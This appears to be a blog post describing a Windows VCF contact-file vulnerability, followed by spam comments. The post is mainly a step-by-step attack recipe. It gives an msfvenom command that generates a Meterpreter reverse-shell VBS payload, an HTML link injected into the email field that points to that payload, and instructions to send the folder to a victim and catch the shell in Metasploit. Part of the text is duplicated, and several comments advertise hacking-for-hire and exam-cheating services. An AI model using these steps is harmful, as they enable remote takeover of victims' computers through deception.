John Page a cyber security researcher brought this vulnerability, which was a 0 day exploit working on latest windows 10 too.
Introduction: He discovered that if we replace the website in a VCF file with the local path of a ".cpl" file, it tends to install that file instead of opening it on browser. This is done by replacing "http://" with "http.\\" or we can also inject some html in email field to do same and when user clicks on it we get a shell. (This exploit uses human interaction)
Proof Of Concept:
1. We need to create a simple payload. ( I used msfvenom and selected format as ".vbs")
Introduction: He discovered that if we replace the website in a VCF file with the local path of a ".cpl" file, it tends to install that file instead of opening it on browser. This is done by replacing "http://" with "http.\\" or we can also inject some html in email field to do same and when user clicks on it we get a shell. (This exploit uses human interaction)
Proof Of Concept:
1. We need to create a simple payload. ( I used msfvenom and selected format as ".vbs")
msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<lport> -f vbs > <file_name>.vbs
2. Inject html with href value to payload file name inside email field (Both files present in same folder). And save the file
<a href="shell.vbs">alokkumar@gmail.com</a>
3. Now we have to send this folder to the victim.
4. Set up multi/handler with proper options in metasploit and wait for victim to click on link
5. When user clicks on link we get a shell.
This exploit needs user interaction although its a 0 day. Post your comments below, Thanks for reading.
ReplyDeleteThis is just the information I am finding everywhere. Thanks for your blog, I just subscribe your blog. This is a nice blog..
Legitimate Hacker for Hire in Singapore
Your site is truly cool and this is an extraordinary moving article. Ramen deuren
ReplyDeleteExcellent post. I was always checking this blog, and I’m impressed! Extremely useful info specially the last part, I care for such information a lot. I was exploring this particular info for a long time. Thanks to this blog my exploration has ended. convert pdf to png
ReplyDeleteLove this! Thank you. We are having a hatter party next month and these are perfect! real word about travel cases hat
ReplyDeleteThis is a smart blog. I mean it. You have so much knowledge about this issue, and so much passion. You also know how to make people rally behind it, obviously from the responses. Online Exam Hack
ReplyDeleteThis is actually the kind of information I have been trying to find. Thank you for writing this information. 메이저사이트
ReplyDeleteYou have performed a great job on this article. It’s very precise and highly qualitative. You have even managed to make it readable and easy to read. You have some real writing talent. Thank you so much. 토토커뮤니티
ReplyDeleteThanks for sharing nice information with us. i like your post and all you share with us is uptodate and quite informative, i would like to bookmark the page so i can come here again to read you, as you have done a wonderful job. 88카
ReplyDeleteWell-Written article. It will be supportive to anyone who utilizes it, including me. Keep doing what you are doing – can't pause to read more posts. Thanks for the precious help. nursing test bank
ReplyDelete